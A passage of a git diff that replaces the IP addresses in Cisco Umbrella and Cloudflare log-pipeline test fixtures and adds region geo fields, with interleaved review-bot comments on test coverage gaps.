- "1.1.1.1",
- "8.8.8.8"
+ "67.43.156.12",
+ "81.2.69.144"
 ]
 },
 "http": {
@@ -163,8 +169,8 @@
 }
 },
 "event": {
- "ingested": "2021-09-13T18:11:33.789726566Z",
- "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
+ "ingested": "2021-12-09T13:36:00.832441Z",
+ "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
 "category": "network",
 "type": [
 "denied"
@@ -197,25 +203,10 @@
 {
 "source": {
 "nat": {
- "ip": "1.1.1.91"
- },
- "geo": {
- "continent_name": "Asia",
- "country_name": "Taiwan",
- "location": {
- "lon": 121.0,
- "lat": 23.5
- },
- "country_iso_code": "TW"
- },
- "as": {
- "number": 17713,
- "organization": {
- "name": "National Sun Yat-sen University"
- }
+ "ip": "67.43.156.12"
 },
- "address": "192.192.192.135",
- "ip": "192.192.192.135"
+ "address": "192.168.192.135",
+ "ip": "192.168.192.135"
 },
 "url": {
 "path": "/the.js",
@@ -242,8 +233,8 @@
 ""
 ],
 "ip": [
- "192.192.192.135",
- "1.1.1.91"
+ "192.168.192.135",
+ "67.43.156.12"
 ]
 },
 "http": {
@@ -257,8 +248,8 @@
 }
 },
 "event": {
- "ingested": "2021-09-13T18:11:33.789728631Z",
- "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.192.192.135\",\"1.1.1.91\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"",
+ "ingested": "2021-12-09T13:36:00.832447300Z",
+ "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.168.192.135\",\"67.43.156.12\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"",
 "category": "network",
 "type": [
 "allowed"
diff --git a/packages/cisco_umbrella/data_stream/log/fields/ecs.yml b/packages/cisco_umbrella/data_stream/log/fields/ecs.yml
index f4e8e83c499..e38c9a3e6ea 100644
--- a/packages/cisco_umbrella/data_stream/log/fields/ecs.yml
+++ b/packages/cisco_umbrella/data_stream/log/fields/ecs.yml
@@ -24,6 +24,10 @@
 name: destination.geo.country_name
 - external: ecs
 name: destination.geo.continent_name
+- external: ecs
+ name: destination.geo.region_iso_code
+- external: ecs
+ name: destination.geo.region_name
 - external: ecs
 name: destination.geo.country_iso_code
 - description: Longitude and latitude.
diff --git a/packages/cisco_umbrella/docs/README.md b/packages/cisco_umbrella/docs/README.md
index 218d0eafdca..f84172c87f9 100644
--- a/packages/cisco_umbrella/docs/README.md
+++ b/packages/cisco_umbrella/docs/README.md
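Review bot: Only the destination side gains `region_iso_code`/`region_name` declarations in the ecs.yml hunk, but the old expected output shows the pipeline enriching `source.geo` as well (the removed `source.geo` blocks for `1.1.1.1` in the dnslogs fixture and for `192.192.192.135` in the proxylogs fixture), so a real source address that resolves to a region would emit `source.geo.region_iso_code` and `source.geo.region_name` with no field definition behind them. The regenerated fixtures cannot catch this because every remaining source address is either private or `67.43.156.12`, which the output shows is not enriched. If the `source.geo` fields are declared elsewhere in this file (outside the hunk), the symmetrical `- external: ecs` / `  name: source.geo.region_iso_code` and `  name: source.geo.region_name` entries belong beside them.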
@@ -162,6 +162,8 @@ An example event for `log` looks as following:
 | destination.geo.country_iso_code | Country ISO code. | keyword |
 | destination.geo.country_name | Country name. | keyword |
 | destination.geo.location | Longitude and latitude. | geo_point |
+| destination.geo.region_iso_code | Region ISO code. | keyword |
+| destination.geo.region_name | Region name. | keyword |
 | destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
 | destination.mac | MAC address of the destination. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword |
 | destination.nat.ip | Translated ip of destination based NAT sessions (e.g. internet to private DMZ) Typically used with load balancers, firewalls, or routers. | ip |
diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml
index a53ba172c3a..4111e9894d2 100644
--- a/packages/cisco_umbrella/manifest.yml
+++ b/packages/cisco_umbrella/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_umbrella
 title: Cisco Umbrella
-version: 0.3.0
+version: 0.3.1
 license: basic
 description: Collect logs from Cisco Umbrella with Elastic Agent.
 type: integration
diff --git a/packages/cloudflare/changelog.yml b/packages/cloudflare/changelog.yml
index 3a351a94e70..6e0b26f2179 100644
--- a/packages/cloudflare/changelog.yml
+++ b/packages/cloudflare/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.1.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.1.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log
index 91cd1759124..86741ca575b 100644
--- a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log
+++ b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log
@@ -1,3 +1,3 @@
-{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":15169,"ClientCountry":"us","ClientDeviceType":"desktop","ClientIP":"35.232.161.245","ClientIPClass":"noRecord","ClientRequestBytes":2577,"ClientRequestHost":"cf-analytics.com","ClientRequestMethod":"POST","ClientRequestPath":"/wp-cron.php","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestURI":"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestUserAgent":"WordPress/5.2.2;https://cf-analytics.com","ClientSSLCipher":"ECDHE-ECDSA-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.2","ClientSrcPort":55028,"EdgeColoID":14,"EdgeEndTimestamp":"2019-08-02T15:29:08Z","EdgePathingOp":"chl","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"captchaNew","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"","EdgeResponseBytes":2848,"EdgeResponseCompressionRatio":2.64,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":"2019-08-02T15:29:08Z","FirewallMatchesActions":["simulate","challenge"],"FirewallMatchesSources":["firewallRules","firewallRules"],"FirewallMatchesRuleIDs":["094b71fea25d4860a61fa0c6fbbd8d8b","e454fd4a0ce546b3a9a462536613692c"],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"500115ec386354d8","SecurityLevel":"med","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":155978002}
-{"CacheCacheStatus":"hit","CacheResponseBytes":26888,"CacheResponseStatus":200,"CacheTieredFill":true,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"222.97.65.242","ClientIPClass":"noRecord","ClientRequestBytes":5324,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))&timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))&timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)","ClientRequestURI":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"NONE","ClientSSLProtocol":"none","ClientSrcPort":0,"ClientXRequestedWith":"","EdgeColoCode":"33.147.138.217","EdgeColoID":20,"EdgeEndTimestamp":1625752958875000000,"EdgePathingOp":"wl","EdgePathingSrc":"macro","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"eqlplayground.io","EdgeResponseBytes":24743,"EdgeResponseCompressionRatio":0,"EdgeResponseContentType":"application/javascript","EdgeResponseStatus":200,"EdgeServerIP":"1.2.3.4","EdgeStartTimestamp":1625752958812000000,"FirewallMatchesActions":[],"FirewallMatchesRuleIDs":[],"FirewallMatchesSources":[],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol"
:"unknown","ParentRayID":"66b9d9f88b5b4c4f","RayID":"66b9d9f890ae4c4f","SecurityLevel":"off","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":true,"WorkerSubrequestCount":0,"ZoneID":393347122} -{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"149.175.108.201","ClientIPClass":"noRecord","ClientRequestBytes":2520,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/s/eqldemo/security/account","ClientRequestProtocol":"HTTP/2","ClientRequestReferer":"","ClientRequestURI":"/s/eqldemo/security/account","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"AEAD-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.3","ClientSrcPort":61593,"ClientXRequestedWith":"","EdgeColoCode":"AMS","EdgeColoID":20,"EdgeEndTimestamp":1625754264684000000,"EdgePathingOp":"ban","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"183.53.30.34","EdgeResponseBytes":2066,"EdgeResponseCompressionRatio":2.45,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":1625754264676000000,"FirewallMatchesActions":["block"],"FirewallMatchesRuleIDs":["391eb601201e4f2a81038910f2b63f6d"],"FirewallMatchesSources":["firewallRules"],"OriginIP":"7.8.9.1","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"66b9f9da396e4c01","SecurityLevel":"unk","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":
0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":393347122} \ No newline at end of file +{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":15169,"ClientCountry":"us","ClientDeviceType":"desktop","ClientIP":"89.160.20.156","ClientIPClass":"noRecord","ClientRequestBytes":2577,"ClientRequestHost":"cf-analytics.com","ClientRequestMethod":"POST","ClientRequestPath":"/wp-cron.php","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestURI":"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestUserAgent":"WordPress/5.2.2;https://cf-analytics.com","ClientSSLCipher":"ECDHE-ECDSA-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.2","ClientSrcPort":55028,"EdgeColoID":14,"EdgeEndTimestamp":"2019-08-02T15:29:08Z","EdgePathingOp":"chl","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"captchaNew","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"","EdgeResponseBytes":2848,"EdgeResponseCompressionRatio":2.64,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":"2019-08-02T15:29:08Z","FirewallMatchesActions":["simulate","challenge"],"FirewallMatchesSources":["firewallRules","firewallRules"],"FirewallMatchesRuleIDs":["094b71fea25d4860a61fa0c6fbbd8d8b","e454fd4a0ce546b3a9a462536613692c"],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"500115ec386354d8","SecurityLevel":"med","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":155978002} 
+{"CacheCacheStatus":"hit","CacheResponseBytes":26888,"CacheResponseStatus":200,"CacheTieredFill":true,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"89.160.20.156","ClientIPClass":"noRecord","ClientRequestBytes":5324,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))&timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))&timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)","ClientRequestURI":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"NONE","ClientSSLProtocol":"none","ClientSrcPort":0,"ClientXRequestedWith":"","EdgeColoCode":"33.147.138.217","EdgeColoID":20,"EdgeEndTimestamp":1625752958875000000,"EdgePathingOp":"wl","EdgePathingSrc":"macro","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"eqlplayground.io","EdgeResponseBytes":24743,"EdgeResponseCompressionRatio":0,"EdgeResponseContentType":"application/javascript","EdgeResponseStatus":200,"EdgeServerIP":"89.160.20.156","EdgeStartTimestamp":1625752958812000000,"FirewallMatchesActions":[],"FirewallMatchesRuleIDs":[],"FirewallMatchesSources":[],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLPro
tocol":"unknown","ParentRayID":"66b9d9f88b5b4c4f","RayID":"66b9d9f890ae4c4f","SecurityLevel":"off","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":true,"WorkerSubrequestCount":0,"ZoneID":393347122} +{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"89.160.20.156","ClientIPClass":"noRecord","ClientRequestBytes":2520,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/s/eqldemo/security/account","ClientRequestProtocol":"HTTP/2","ClientRequestReferer":"","ClientRequestURI":"/s/eqldemo/security/account","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"AEAD-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.3","ClientSrcPort":61593,"ClientXRequestedWith":"","EdgeColoCode":"AMS","EdgeColoID":20,"EdgeEndTimestamp":1625754264684000000,"EdgePathingOp":"ban","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"183.53.30.34","EdgeResponseBytes":2066,"EdgeResponseCompressionRatio":2.45,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":1625754264676000000,"FirewallMatchesActions":["block"],"FirewallMatchesRuleIDs":["391eb601201e4f2a81038910f2b63f6d"],"FirewallMatchesSources":["firewallRules"],"OriginIP":"89.160.20.156","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"66b9f9da396e4c01","SecurityLevel":"unk","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","Worke
rCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":393347122} \ No newline at end of file diff --git a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json index e98e731cfd2..5290c6b7546 100644 --- a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json @@ -9,26 +9,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.232.161.245", + "address": "89.160.20.156", "port": 55028, "bytes": 2577, - "ip": "35.232.161.245" + "ip": "89.160.20.156" }, "cloudflare": { "parent": { 
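Review bot: All three events in the new fixture use 89.160.20.156 as ClientIP, and the same address is also written to EdgeServerIP in the second event and to OriginIP in the third, so the regenerated expected output has source.ip, destination.ip and observer.ip all equal and carries the same Sweden/Bredband2 AB geo and AS block on every record (see the `@@ -9,26 +9,27 @@` and `@@ -370,37 +378,37 @@` hunks of test-http-json.log-expected.json). A pipeline regression that swapped client and origin fields, or attached enrichment to the wrong address, would no longer be caught by this data; using a different supported address per role — the crowdstrike hunk on this page uses 67.43.156.15 — would keep that distinct-value coverage. `"EdgeColoCode":"33.147.138.217"` and `"EdgeRequestHost":"183.53.30.34"` remain unchanged public addresses in the new lines; whether the pipeline treats those fields as IPs is not visible here, but they should be checked against the same supported-subset rule the changelog entry describes.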
@@ -141,26 +142,27 @@ }, "client": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.232.161.245", + "address": "89.160.20.156", "port": 55028, "bytes": 2577, - "ip": "35.232.161.245" + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-ECDSA-AES128-GCM-SHA256", 
@@ -169,8 +171,8 @@ }, "event": { "duration": 0, - "ingested": "2021-08-10T07:34:12.277479800Z", - "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":15169,\"ClientCountry\":\"us\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"35.232.161.245\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2577,\"ClientRequestHost\":\"cf-analytics.com\",\"ClientRequestMethod\":\"POST\",\"ClientRequestPath\":\"/wp-cron.php\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestURI\":\"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestUserAgent\":\"WordPress/5.2.2;https://cf-analytics.com\",\"ClientSSLCipher\":\"ECDHE-ECDSA-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.2\",\"ClientSrcPort\":55028,\"EdgeColoID\":14,\"EdgeEndTimestamp\":\"2019-08-02T15:29:08Z\",\"EdgePathingOp\":\"chl\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"captchaNew\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"\",\"EdgeResponseBytes\":2848,\"EdgeResponseCompressionRatio\":2.64,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":\"2019-08-02T15:29:08Z\",\"FirewallMatchesActions\":[\"simulate\",\"challenge\"],\"FirewallMatchesSources\":[\"firewallRules\",\"firewallRules\"],\"FirewallMatchesRuleIDs\":[\"094b71fea25d4860a61fa0c6fbbd8d8b\",\"e454fd4a0ce546b3a9a462536613692c\"],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"500115ec386354d8\",\"SecurityLevel\":\"med\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"
\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":155978002}", + "ingested": "2021-12-09T13:36:03.427502200Z", + "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":15169,\"ClientCountry\":\"us\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2577,\"ClientRequestHost\":\"cf-analytics.com\",\"ClientRequestMethod\":\"POST\",\"ClientRequestPath\":\"/wp-cron.php\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestURI\":\"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestUserAgent\":\"WordPress/5.2.2;https://cf-analytics.com\",\"ClientSSLCipher\":\"ECDHE-ECDSA-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.2\",\"ClientSrcPort\":55028,\"EdgeColoID\":14,\"EdgeEndTimestamp\":\"2019-08-02T15:29:08Z\",\"EdgePathingOp\":\"chl\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"captchaNew\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"\",\"EdgeResponseBytes\":2848,\"EdgeResponseCompressionRatio\":2.64,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":\"2019-08-02T15:29:08Z\",\"FirewallMatchesActions\":[\"simulate\",\"challenge\"],\"FirewallMatchesSources\":[\"firewallRules\",\"firewallRules\"],\"FirewallMatchesRuleIDs\":[\"094b71fea25d4860a61fa0c6fbbd8d8b\",\"e454fd4a0ce546b3a9a462536613692c\"],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"500115ec386354d8\",\"SecurityLevel\":\"med\",\"WAFA
ction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":155978002}", "kind": "event", "start": "2019-08-02T15:29:08.000Z", "end": "2019-08-02T15:29:08.000Z", @@ -194,24 +196,27 @@ }, "source": { "geo": { - "continent_name": "Asia", - "country_name": "South Korea", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 126.9741, - "lat": 37.5112 - }, - "country_iso_code": "KR" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 4766, + "number": 29518, "organization": { - "name": "Korea Telecom" + "name": "Bredband2 AB" } }, - "address": "222.97.65.242", + "address": "89.160.20.156", "port": 0, "bytes": 5324, - "ip": "222.97.65.242" + "ip": "89.160.20.156" }, "cloudflare": { "parent": { @@ -296,19 +301,19 @@ "observer": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": 17.8167, + "lat": 59.2 } }, "type": "proxy", "vendor": "cloudflare", - "ip": "1.2.3.4" + "ip": "89.160.20.156" }, "@timestamp": "2021-07-08T14:02:38.812Z", "http": { 
